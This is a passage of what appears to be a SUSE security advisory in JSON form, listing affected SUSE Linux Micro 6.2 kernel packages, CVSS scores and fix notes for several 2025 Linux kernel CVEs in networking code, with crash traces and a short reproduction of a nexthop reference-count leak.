"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71095",
"url": "https://www.suse.com/security/cve/CVE-2025-71095"
},
{
"category": "external",
"summary": "SUSE Bug 1256605 for CVE-2025-71095",
"url": "https://bugzilla.suse.com/1256605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71097",
"url": "https://www.suse.com/security/cve/CVE-2025-71097"
},
{
"category": "external",
"summary": "SUSE Bug 1256607 for CVE-2025-71097",
"url": "https://bugzilla.suse.com/1256607"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71098"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71098",
"url": "https://www.suse.com/security/cve/CVE-2025-71098"
},
{
"category": "external",
"summary": "SUSE Bug 1256591 for CVE-2025-71098",
"url": "https://bugzilla.suse.com/1256591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
